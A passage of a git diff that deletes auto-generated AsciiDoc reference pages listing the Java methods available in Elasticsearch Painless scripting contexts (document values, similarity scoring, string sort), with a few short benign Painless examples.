{java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptDocValues-Strings]] -==== ScriptDocValues.Strings -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def 
find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* null get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* null getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-index-mapper"] -=== Shared API for package org.elasticsearch.index.mapper -See the <> for a high-level overview of all packages and classes. 
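To make the `ScriptDocValues` listings above concrete, here is a minimal Painless sketch. It is not part of the generated reference: the field names (`population`, `location`) are invented, and it assumes a search script context where the `doc` values map is available.

[source,painless]
----
// A minimal sketch, not part of the generated reference; field names are invented.
if (doc['population'].size() == 0) {                         // Collection.size()
  return 0;
}
long population = doc['population'].getValue();              // ScriptDocValues.Longs.getValue()
double meters = doc['location'].arcDistance(52.52, 13.40);   // ScriptDocValues.GeoPoints.arcDistance(double, double)
return population / (meters / 1000.0 + 1.0);
----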
- -[[painless-api-reference-shared-IpFieldMapper-IpFieldType-IpScriptDocValues]] -==== IpFieldMapper.IpFieldType.IpScriptDocValues -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* void {java11-javadoc}/java.base/java/util/List.html#add(int,java.lang.Object)[add](int, def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/List.html#addAll(int,java.util.Collection)[addAll](int, Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/List.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* null get(int) -* Object getByPath(null) -* Object getByPath(null, Object) -* int getLength() -* null getValue() -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/List.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/util/List.html#indexOf(java.lang.Object)[indexOf](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* int {java11-javadoc}/java.base/java/util/List.html#lastIndexOf(java.lang.Object)[lastIndexOf](def) -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator()[listIterator]() -* ListIterator {java11-javadoc}/java.base/java/util/List.html#listIterator(int)[listIterator](int) -* def {java11-javadoc}/java.base/java/util/List.html#remove(int)[remove](int) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* void {java11-javadoc}/java.base/java/util/List.html#replaceAll(java.util.function.UnaryOperator)[replaceAll](UnaryOperator) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* def {java11-javadoc}/java.base/java/util/List.html#set(int,java.lang.Object)[set](int, def) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* void {java11-javadoc}/java.base/java/util/List.html#sort(java.util.Comparator)[sort](Comparator) -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* List {java11-javadoc}/java.base/java/util/List.html#subList(int,int)[subList](int, int) -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] 
{java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-index-query"] -=== Shared API for package org.elasticsearch.index.query -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-IntervalFilterScript-Interval]] -==== IntervalFilterScript.Interval -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int getEnd() -* int getGaps() -* int getStart() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-index-similarity"] -=== Shared API for package org.elasticsearch.index.similarity -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-ScriptedSimilarity-Doc]] -==== ScriptedSimilarity.Doc -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float getFreq() -* int getLength() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptedSimilarity-Field]] -==== ScriptedSimilarity.Field -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long getDocCount() -* long getSumDocFreq() -* long getSumTotalTermFreq() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptedSimilarity-Query]] -==== ScriptedSimilarity.Query -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float getBoost() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ScriptedSimilarity-Term]] -==== ScriptedSimilarity.Term -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* long getDocFreq() -* long getTotalTermFreq() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-painless-api"] -=== Shared API for package org.elasticsearch.painless.api -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-Debug]] -==== Debug -* static void explain(Object) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-script"] -=== Shared API for package org.elasticsearch.script -See the <> for a high-level overview of all packages and classes. 
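The date-time class listed below is what `doc['some_date'].value` returns for `date` fields in scripts at this version; it mixes `java.time`-style accessors with Joda-style convenience getters. A hedged sketch follows; the field name `@timestamp` is an assumption made for illustration.

[source,painless]
----
// Hedged sketch: assumes a `date` field named `@timestamp` with doc values.
def ts = doc['@timestamp'].value;        // JodaCompatibleZonedDateTime
int hour = ts.getHour();                 // java.time-style accessor
int dayOfWeek = ts.getDayOfWeek();       // Joda-style numeric getter
long epochMillis = ts.getMillis();       // Joda-style epoch milliseconds
ZonedDateTime nextWeek = ts.plusDays(7); // arithmetic returns a ZonedDateTime
return hour >= 9 && hour < 17 && dayOfWeek <= 5;
----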
- -[[painless-api-reference-shared-JodaCompatibleZonedDateTime]] -==== JodaCompatibleZonedDateTime -* int {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#compareTo(java.time.chrono.ChronoZonedDateTime)[compareTo](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#format(java.time.format.DateTimeFormatter)[format](DateTimeFormatter) -* int {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#get(java.time.temporal.TemporalField)[get](TemporalField) -* int getCenturyOfEra() -* Chronology {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getChronology()[getChronology]() -* int getDayOfMonth() -* int getDayOfWeek() -* DayOfWeek getDayOfWeekEnum() -* int getDayOfYear() -* int getEra() -* int getHour() -* int getHourOfDay() -* long {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#getLong(java.time.temporal.TemporalField)[getLong](TemporalField) -* long getMillis() -* int getMillisOfDay() -* int getMillisOfSecond() -* int getMinute() -* int getMinuteOfDay() -* int getMinuteOfHour() -* Month getMonth() -* int getMonthOfYear() -* int getMonthValue() -* int getNano() -* ZoneOffset {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getOffset()[getOffset]() -* int getSecond() -* int getSecondOfDay() -* int getSecondOfMinute() -* int getWeekOfWeekyear() -* int getWeekyear() -* int getYear() -* int getYearOfCentury() -* int getYearOfEra() -* ZoneId {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#getZone()[getZone]() -* int {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isAfter(java.time.chrono.ChronoZonedDateTime)[isAfter](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isBefore(java.time.chrono.ChronoZonedDateTime)[isBefore](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#isEqual(java.time.chrono.ChronoZonedDateTime)[isEqual](ChronoZonedDateTime) -* boolean {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#isSupported(java.time.temporal.TemporalField)[isSupported](TemporalField) -* ZonedDateTime minus(TemporalAmount) -* ZonedDateTime minus(long, TemporalUnit) -* ZonedDateTime minusDays(long) -* ZonedDateTime minusHours(long) -* ZonedDateTime minusMinutes(long) -* ZonedDateTime minusMonths(long) -* ZonedDateTime minusNanos(long) -* ZonedDateTime minusSeconds(long) -* ZonedDateTime minusWeeks(long) -* ZonedDateTime minusYears(long) -* ZonedDateTime plus(TemporalAmount) -* ZonedDateTime plus(long, TemporalUnit) -* ZonedDateTime plusDays(long) -* ZonedDateTime plusHours(long) -* ZonedDateTime plusMinutes(long) -* ZonedDateTime plusMonths(long) -* ZonedDateTime plusNanos(long) -* ZonedDateTime plusSeconds(long) -* ZonedDateTime plusWeeks(long) -* ZonedDateTime plusYears(long) -* def {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#query(java.time.temporal.TemporalQuery)[query](TemporalQuery) -* ValueRange {java11-javadoc}/java.base/java/time/temporal/TemporalAccessor.html#range(java.time.temporal.TemporalField)[range](TemporalField) -* long {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toEpochSecond()[toEpochSecond]() -* Instant 
{java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toInstant()[toInstant]() -* LocalDate toLocalDate() -* LocalDateTime toLocalDateTime() -* LocalTime {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toLocalTime()[toLocalTime]() -* OffsetDateTime toOffsetDateTime() -* null {java11-javadoc}/java.base/java/time/chrono/ChronoZonedDateTime.html#toString()[toString]() -* null toString(null) -* null toString(null, Locale) -* ZonedDateTime truncatedTo(TemporalUnit) -* long {java11-javadoc}/java.base/java/time/temporal/Temporal.html#until(java.time.temporal.Temporal,java.time.temporal.TemporalUnit)[until](Temporal, TemporalUnit) -* ZonedDateTime with(TemporalAdjuster) -* ZonedDateTime with(TemporalField, long) -* ZonedDateTime withDayOfMonth(int) -* ZonedDateTime withDayOfYear(int) -* ZonedDateTime withEarlierOffsetAtOverlap() -* ZonedDateTime withFixedOffsetZone() -* ZonedDateTime withHour(int) -* ZonedDateTime withLaterOffsetAtOverlap() -* ZonedDateTime withMinute(int) -* ZonedDateTime withMonth(int) -* ZonedDateTime withNano(int) -* ZonedDateTime withSecond(int) -* ZonedDateTime withYear(int) -* ZonedDateTime withZoneSameInstant(ZoneId) -* ZonedDateTime withZoneSameLocal(ZoneId) - - -[role="exclude",id="painless-api-reference-shared-org-elasticsearch-search-lookup"] -=== Shared API for package org.elasticsearch.search.lookup -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-FieldLookup]] -==== FieldLookup -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* def getValue() -* List getValues() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean isEmpty() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-similarity-weight/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-similarity-weight/index.asciidoc deleted file mode 100644 index 8d9813dd363..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-similarity-weight/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-similarity-weight]] -=== Similarity Weight API - -The following specialized API is available in the Similarity Weight context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-similarity-weight/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-similarity-weight/packages.asciidoc deleted file mode 100644 index a0510fb5f78..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-similarity-weight/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-similarity-weight-java-lang"] -=== Similarity Weight API for package java.lang -See the <> for a high-level overview of all packages and classes. 
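The Similarity Weight context pairs the java.lang whitelist below with the `ScriptedSimilarity.Query`, `Field`, and `Term` classes listed under the shared API above. The weight script runs once per query term, so it only sees query, field, and term statistics. A hedged sketch of an IDF-style weight script body:

[source,painless]
----
// Hedged sketch of a similarity weight script body: `query`, `field`,
// and `term` are provided by the context; there is no `doc` variable here.
double idf = Math.log((field.docCount + 1.0) / (term.docFreq + 1.0)) + 1.0;
return query.boost * idf;
----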
- -[[painless-api-reference-similarity-weight-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-similarity/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-similarity/index.asciidoc deleted file mode 100644 index f8d65739b63..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-similarity/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-similarity]] -=== Similarity API - -The following specialized API is available in the Similarity context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-similarity/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-similarity/packages.asciidoc deleted file mode 100644 index 6bd05a8f495..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-similarity/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-similarity-java-lang"] -=== Similarity API for package java.lang -See the <> for a high-level overview of all packages and classes. 
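The Similarity context adds the per-document `ScriptedSimilarity.Doc` variable on top of the same classes, and when a weight script is configured its result is exposed to this script as `weight`. A hedged sketch of the per-document scoring body under those assumptions:

[source,painless]
----
// Hedged sketch of a similarity script body: `doc` carries per-document
// term frequency and length, `weight` is the value from the weight script.
double tf = Math.sqrt(doc.freq);
double norm = 1 / Math.sqrt(doc.length);
return weight * tf * norm;
----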
- -[[painless-api-reference-similarity-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean 
{java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-string-sort/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-string-sort/index.asciidoc deleted file mode 100644 index bf6121a8d99..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-string-sort/index.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-string-sort]] -=== String Sort API - -The following specialized API is available in the String Sort context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.geo -<> - -* <> - -==== org.elasticsearch.xpack.sql.expression.literal.interval -<> - -* <> -* <> - -include::packages.asciidoc[] 